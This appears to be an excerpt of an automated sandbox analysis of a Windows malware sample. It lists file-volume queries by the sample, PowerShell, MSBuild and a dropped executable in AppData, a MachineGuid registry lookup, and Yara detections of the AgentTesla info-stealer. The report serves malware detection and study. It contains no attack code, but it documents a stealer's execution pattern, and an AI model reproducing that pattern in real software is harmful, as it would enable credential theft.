Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Queries volume information: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPE
